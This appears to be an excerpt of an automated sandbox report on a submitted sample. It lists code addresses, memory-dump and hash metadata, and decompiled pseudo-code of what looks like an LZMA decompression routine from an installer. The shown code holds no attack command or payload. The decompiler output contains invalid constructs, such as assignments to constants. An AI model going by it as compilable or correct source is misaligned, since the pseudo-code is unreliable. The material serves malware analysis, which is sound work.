                                              0x00406ad6
                                              0x00406af1
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x004066e1
                                              0x004066e1
                                              0x00000000
                                              0x004066e1
                                              0x00406962
                                              0x00406b97
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00406bce
                                              0x00406bce
                                              0x00000000
                                              0x00406bce
                                              0x00406a1b
                                              0x004069a2
                                              0x0040699f
                                              0x00000000
                                              0x004066f4

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                              • Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
                                              • Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                              • Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040663C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0040663C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
